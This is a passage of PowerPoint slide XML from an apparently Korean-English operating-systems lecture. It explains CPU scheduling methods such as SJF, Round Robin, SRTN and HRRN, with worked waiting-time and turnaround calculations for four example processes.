            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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a:t>태도</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>(10%)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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Process Information </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a:t>&lt; Scheduling Method &gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1"/>
              <a:t>SPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shortest Process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1"/>
              <a:t>SJF</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>P3 Process “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Arrival Time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>” = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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a:t>P3 Process “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Burst Time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>” = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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a:t>9</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>P3 Process “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Waiting Time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>” = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>15</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>P1</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="11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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>P2</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="11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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>P3</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="11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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>P4</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="11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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>8 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>시간</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="12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a:t>4 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>시간</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="12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a:t>9 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>시간</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="12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a:t>5 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>시간</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="12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a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>시간 간격으로 실행</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>9</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>P3 Process “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Service Time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>” =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 17 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Average</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Waiting Time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>” =</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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a:t>(0+7+15+9)/4 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7.75 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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a:t>P3 Process “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Response Ratio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>” = (9+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>)/9 =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 2.11 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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a:t>P3 Process “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Turnaround Time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>” =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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a:t>24</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>P3 Process “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NTT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>” =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>24/9 =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2.66</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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Process Information </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a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>&lt; Scheduling Method &gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1"/>
              <a:t>RR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Round Robin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>- Time Quantum = 5</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Average</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Waiting Time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>” =</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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a:t>(14+4+15+11)/4 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>11 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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a:t>Context switching </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cpu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>부하 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>부담</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>++</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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Scheduling Method</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a:t>SPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shortest Process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="1"/>
              <a:t>SJF</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1"/>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a:t>Burst Time </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:t>FCFS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>First Come First Served</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>Arrival Time </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:t>RR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Round Robin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>순서대로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>Time Quantum </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:t>SRTN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shortest Remain Time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="140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a:t>Remain Time </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:t>HRRN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Highest Response Ratio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>Response Ratio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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Process Management </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나의 일상이란</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" kern="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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>시 시작</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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>웹서핑</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(chrome.exe) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>시간</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>시 시작</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주식 계산 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>(calc.exe) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>시간</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="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3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>시 시작</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게임 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Leage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> of Legend.exe) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>시간</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="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4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
